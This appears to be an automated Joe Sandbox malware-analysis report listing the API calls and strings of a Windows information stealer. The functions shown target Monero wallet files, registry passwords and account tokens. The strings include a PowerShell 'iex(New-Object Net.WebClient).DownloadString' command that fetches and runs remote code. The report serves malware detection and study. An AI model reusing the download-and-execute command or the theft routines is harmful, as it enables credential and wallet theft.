                                • Instruction Fuzzy Hash: 5B717AB6A00218A7CB14EBA0EC95FEE77B9BB48300F045598F605B7181EA35DB45CF91
                                APIs
                                  • Part of subcall function 00E112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E112B4
                                  • Part of subcall function 00E112A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E112BB
                                  • Part of subcall function 00E112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E112D7
                                  • Part of subcall function 00E112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E112F5
                                  • Part of subcall function 00E112A0: RegCloseKey.ADVAPI32(?), ref: 00E112FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1134F
                                • lstrlen.KERNEL32(?), ref: 00E1135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00E11377
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E28B60: GetSystemTime.KERNEL32(00E30E1A,008FA028,00E305AE,?,?,00E113F9,?,0000001A,00E30E1A,00000000,?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E28B86
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E11465
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                  • Part of subcall function 00E199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                  • Part of subcall function 00E199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                  • Part of subcall function 00E199C0: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                  • Part of subcall function 00E199C0: LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                  • Part of subcall function 00E199C0: CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00E114EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 0abcefdd94f86666a9c0488cfff2d81ff07b91eb8a9c932a9b4fcad007058736
                                • Instruction ID: 307adc5c298cd9556b9283278789bc496ae751547bf5f8c77bcc3577baf32f39
                                • Opcode Fuzzy Hash: 0abcefdd94f86666a9c0488cfff2d81ff07b91eb8a9c932a9b4fcad007058736
                                • Instruction Fuzzy Hash: 045167B295022897CB19EB60EC96FED73BCAF54300F4451A8B20A72081EE745B85CB95
                                APIs
                                  • Part of subcall function 00E172D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E1733A
                                  • Part of subcall function 00E172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E173B1
                                  • Part of subcall function 00E172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E1740D
                                  • Part of subcall function 00E172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00E17452
                                  • Part of subcall function 00E172D0: HeapFree.KERNEL32(00000000), ref: 00E17459
                                • lstrcat.KERNEL32(00000000,00E317FC), ref: 00E17606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E17648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00E1765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E1768F
                                • lstrcat.KERNEL32(00000000,00E31804), ref: 00E176A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E176D3
                                • lstrcat.KERNEL32(00000000,00E31808), ref: 00E176ED
                                • task.LIBCPMTD ref: 00E176FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: b8f943c8710209623d71c336c71ec7195b15901cc714d8803261cd1237093fed
                                • Instruction ID: e8ce25d98c216f9f9cfc17dd32c7cf35da28ae87cafb84d753492d1bbb2fc54b
                                • Opcode Fuzzy Hash: b8f943c8710209623d71c336c71ec7195b15901cc714d8803261cd1237093fed
                                • Instruction Fuzzy Hash: 78311072A01209EBCB18EBA4DD59DFF77B5FB48301F205258F142B7185DA39A986CB60
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008FD838,00000000,?,00E30E2C,00000000,?,00000000), ref: 00E28130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E28137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E28158
                                • __aulldiv.LIBCMT ref: 00E28172
                                • __aulldiv.LIBCMT ref: 00E28180
                                • wsprintfA.USER32 ref: 00E281AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: da8627227f00f4c64a9fb39256138f45ab6cd7bb2bbb4bb04b45371a54e4363c
                                • Instruction ID: 1b85e091f4552492de57ab23c969a3c62b3bc1f6238f53279e7e259ed7a3ac48
                                • Opcode Fuzzy Hash: da8627227f00f4c64a9fb39256138f45ab6cd7bb2bbb4bb04b45371a54e4363c
                                • Instruction Fuzzy Hash: 232118B1A44318ABDB10DB94DD4AFAEB7B8FB44B10F204209F605BB284C77969018BA4
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14839
                                  • Part of subcall function 00E147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14849
                                • InternetOpenA.WININET(00E30DF7,00000001,00000000,00000000,00000000), ref: 00E1610F
                                • StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E16147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E1618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E161B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00E161DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E1620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00E16249
                                • InternetCloseHandle.WININET(?), ref: 00E16253
                                • InternetCloseHandle.WININET(00000000), ref: 00E16260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 82eeb2f6910cf10002ebb75f90b966fbfcef057d9aa5e9d9044ee91e58580cfa
                                • Instruction ID: cc0f261f9bb0413e117cd40f51acb9785791b15ffa220c8d0115bf032ba93a92
                                • Opcode Fuzzy Hash: 82eeb2f6910cf10002ebb75f90b966fbfcef057d9aa5e9d9044ee91e58580cfa
                                • Instruction Fuzzy Hash: 5C518FB1A00218ABDB24DF60DC49BEE77B8FB44305F109198F606B71C0DB756A85CF95
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E1733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E173B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E1740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E17452
                                • HeapFree.KERNEL32(00000000), ref: 00E17459
                                • task.LIBCPMTD ref: 00E17555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: 1d7897bb8bcdc267d44d18b5be600af4cd1b14e3a2a6fd163fb7d014ac4a99bc
                                • Instruction ID: b45daa58e5f169c6348de22044ad18db58a6a98b8691e2a57408c1d33e5496b5
                                • Opcode Fuzzy Hash: 1d7897bb8bcdc267d44d18b5be600af4cd1b14e3a2a6fd163fb7d014ac4a99bc
                                • Instruction Fuzzy Hash: F7615AB190422C9BDB24DB50DC55BDAB7B8BF48300F0091E9E689B6141EBB45BC9CFA0
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                • lstrlen.KERNEL32(00000000), ref: 00E1BC9F
                                  • Part of subcall function 00E28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E1BCCD
                                • lstrlen.KERNEL32(00000000), ref: 00E1BDA5
                                • lstrlen.KERNEL32(00000000), ref: 00E1BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 1f917873df8afd23127a20f2b06ce4aef952e3acee34190ec46b2441a749d316
                                • Instruction ID: b2c3325a258eeddad25c9e29a36dce6a1dc265df20d318e88acb9b1179fee875
                                • Opcode Fuzzy Hash: 1f917873df8afd23127a20f2b06ce4aef952e3acee34190ec46b2441a749d316
                                • Instruction Fuzzy Hash: 3AB153729102189BDB18FBA0EC56EEE77B8BF54300F445568F507B3091EF746A49CB62
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 146ce5db9ec14bfd663569a0b1cd31584288843517992e28d03142ce0c781a17
                                • Instruction ID: b20d92096478ec0ecc27a9a3eda3effcd02d1a40e006ca66d6fdc3c0692dfa41
                                • Opcode Fuzzy Hash: 146ce5db9ec14bfd663569a0b1cd31584288843517992e28d03142ce0c781a17
                                • Instruction Fuzzy Hash: 7AF05E30A0431DEFD3649FE0E90972D7F70FB04707F040399E64A97284D67A4B419B95
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E14FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E14FD1
                                • InternetOpenA.WININET(00E30DDF,00000000,00000000,00000000,00000000), ref: 00E14FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E15011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E15041
                                • InternetCloseHandle.WININET(?), ref: 00E150B9
                                • InternetCloseHandle.WININET(?), ref: 00E150C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: a20490bcbd01ef0aa39e5e8f3c46720006d3124c603f4c011f5f2e65f939a312
                                • Instruction ID: 7e94c0e3cb6b6338a426e1a7a2d01f93bbbf3b43834890459baf24f44d0a19c9
                                • Opcode Fuzzy Hash: a20490bcbd01ef0aa39e5e8f3c46720006d3124c603f4c011f5f2e65f939a312
                                • Instruction Fuzzy Hash: 9231F2B5A00218EBDB20CF94DC85BD9B7B4FB48704F1081D9AA0AA7281C7746EC58F98
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E28426
                                • wsprintfA.USER32 ref: 00E28459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E2847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E2848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E28499
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,008FDA48,00000000,000F003F,?,00000400), ref: 00E284EC
                                • lstrlen.KERNEL32(?), ref: 00E28501
                                • RegQueryValueExA.ADVAPI32(00000000,008FD850,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E30B34), ref: 00E28599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E28608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E2861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 6a36136ff95271e17d423efbdf2a2843bf2f6150e332f2f69ea6b9d3e2d327f0
                                • Instruction ID: 847b896350f3faa08642773ca9dc206b050dd93e1bfb6bd31b0effa0feaab74c
                                • Opcode Fuzzy Hash: 6a36136ff95271e17d423efbdf2a2843bf2f6150e332f2f69ea6b9d3e2d327f0
                                • Instruction Fuzzy Hash: 9C21F6B1A1022CABDB24DB54DC85FE9B7B8FB48704F048298A649A6140DF756A85CFA4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E276A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E276AB
                                • RegOpenKeyExA.ADVAPI32(80000002,008EB738,00000000,00020119,00000000), ref: 00E276DD
                                • RegQueryValueExA.ADVAPI32(00000000,008FD940,00000000,00000000,?,000000FF), ref: 00E276FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E27708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 9a848d5b0db8737ff6a68d2d336c5c9cd3427b15e72e1c01c65c8276ecd43e6f
                                • Instruction ID: c43b09054b30a8bf91e02375bf6eea79096fbb8aa3457eac5453af07e7d25b4f
                                • Opcode Fuzzy Hash: 9a848d5b0db8737ff6a68d2d336c5c9cd3427b15e72e1c01c65c8276ecd43e6f
                                • Instruction Fuzzy Hash: 1A018FB4B00308FFDB10DBE0EC49FAFBBB8EB48701F004155FA85A7284E6B999008B50
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E2773B
                                • RegOpenKeyExA.ADVAPI32(80000002,008EB738,00000000,00020119,00E276B9), ref: 00E2775B
                                • RegQueryValueExA.ADVAPI32(00E276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E2777A
                                • RegCloseKey.ADVAPI32(00E276B9), ref: 00E27784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 3cc88794bf7189533c650d221694608e4fffd7873f4f231c68b3206198c7cff2
                                • Instruction ID: 2e0c0e73d473cea14a8ca990a942d216a85780530b6527de7718dda0bcf1e4b4
                                • Opcode Fuzzy Hash: 3cc88794bf7189533c650d221694608e4fffd7873f4f231c68b3206198c7cff2
                                • Instruction Fuzzy Hash: 700144B5A40308FFD710DBE4DC49FBFBBB8EB48705F004255FA45A7285DA7559008B50
                                APIs
                                • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00E23AEE,?), ref: 00E292FC
                                • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00E29319
                                • CloseHandle.KERNEL32(000000FF), ref: 00E29327
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :$:
                                • API String ID: 1378416451-4250114551
                                • Opcode ID: 37b56f7e5ec71243065ae85bc89629046c60404ee0829c0a83eec459383ee0b5
                                • Instruction ID: 9ce189b2c2fcc7fc621db6caabf147309f8267c06815627175bd4a3a8b608591
                                • Opcode Fuzzy Hash: 37b56f7e5ec71243065ae85bc89629046c60404ee0829c0a83eec459383ee0b5
                                • Instruction Fuzzy Hash: 1EF03C39F40308FBDB20DBB0EC49B9E77B9AB48710F109254B651A72C4DB7596018B40
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                • LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: a7f15ccfe27d18331298e5c1303853edd63fd9f0326ea96c6d515ab92c16a14c
                                • Instruction ID: 0300e5b56bcadf857452705ba973076f7b6a72a06def5558d6f51715f3bd29e9
                                • Opcode Fuzzy Hash: a7f15ccfe27d18331298e5c1303853edd63fd9f0326ea96c6d515ab92c16a14c
                                • Instruction Fuzzy Hash: C8312BB4A00209EFDB24CF94D895BEE77B5FF48304F108158E902B7280D779A985CFA0
                                APIs
                                • lstrcat.KERNEL32(?,008FDD30), ref: 00E247DB
                                  • Part of subcall function 00E28DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24801
                                • lstrcat.KERNEL32(?,?), ref: 00E24820
                                • lstrcat.KERNEL32(?,?), ref: 00E24834
                                • lstrcat.KERNEL32(?,008EB338), ref: 00E24847
                                • lstrcat.KERNEL32(?,?), ref: 00E2485B
                                • lstrcat.KERNEL32(?,008FD7B8), ref: 00E2486F
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E28D90: GetFileAttributesA.KERNEL32(00000000,?,00E11B54,?,?,00E3564C,?,?,00E30E1F), ref: 00E28D9F
                                  • Part of subcall function 00E24570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E24580
                                  • Part of subcall function 00E24570: RtlAllocateHeap.NTDLL(00000000), ref: 00E24587
                                  • Part of subcall function 00E24570: wsprintfA.USER32 ref: 00E245A6
                                  • Part of subcall function 00E24570: FindFirstFileA.KERNEL32(?,?), ref: 00E245BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: ed57a0bec157e419e207760f1af9278fafb206298fefe3850d50826b372a1855
                                • Instruction ID: 4063d7521dd180d3e1dcdcedb2861c1e8ef0963158c27dbd960c95c4c15c9d18
                                • Opcode Fuzzy Hash: ed57a0bec157e419e207760f1af9278fafb206298fefe3850d50826b372a1855
                                • Instruction Fuzzy Hash: 3A3173B2900318A7CB24F7B0EC85EEE73BCBB48700F405599B359A6081EE7597C9CB95
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00E22D85
                                Strings
                                • <, xrefs: 00E22D39
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E22CC4
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E22D04
                                • ')", xrefs: 00E22CB3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 718f6d7d37589ecc2400dc372630c60603d01455cb2c9f839a62e3a1fab7f13b
                                • Instruction ID: ab6638a3309ee63afa9d2038c91db200654d11d7a2c718ff22523622701538c3
                                • Opcode Fuzzy Hash: 718f6d7d37589ecc2400dc372630c60603d01455cb2c9f839a62e3a1fab7f13b
                                • Instruction Fuzzy Hash: A641DE71D102189BDB18FFA0E896BEDBBB4AF14300F445129F106B7191DF746A8ACF92
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E19F41
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,008FD578,00000000,00020119,?), ref: 00E240F4
                                • RegQueryValueExA.ADVAPI32(?,008FDC10,00000000,00000000,00000000,000000FF), ref: 00E24118
                                • RegCloseKey.ADVAPI32(?), ref: 00E24122
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24147
                                • lstrcat.KERNEL32(?,008FDC40), ref: 00E2415B
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00E2696C
                                • sscanf.NTDLL ref: 00E26999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E269B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E269C0
                                • ExitProcess.KERNEL32 ref: 00E269DA
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E27E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,008EB818,00000000,00020119,?), ref: 00E27E5E
                                • RegQueryValueExA.ADVAPI32(?,008FD498,00000000,00000000,000000FF,000000FF), ref: 00E27E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00E27E92
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                APIs
                                • StrStrA.SHLWAPI(008FDAC0,?,?,?,00E2140C,?,008FDAC0,00000000), ref: 00E2926C
                                • lstrcpyn.KERNEL32(0105AB88,008FDAC0,008FDAC0,?,00E2140C,?,008FDAC0), ref: 00E29290
                                • lstrlen.KERNEL32(?,?,00E2140C,?,008FDAC0), ref: 00E292A7
                                • wsprintfA.USER32 ref: 00E292C7
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E112B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E112BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E112D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E112F5
                                • RegCloseKey.ADVAPI32(?), ref: 00E112FF
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                APIs
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E26663
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00E26726
                                • ExitProcess.KERNEL32 ref: 00E26755
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E30E28,00000000,?), ref: 00E2882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E28836
                                • wsprintfA.USER32 ref: 00E28850
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                APIs
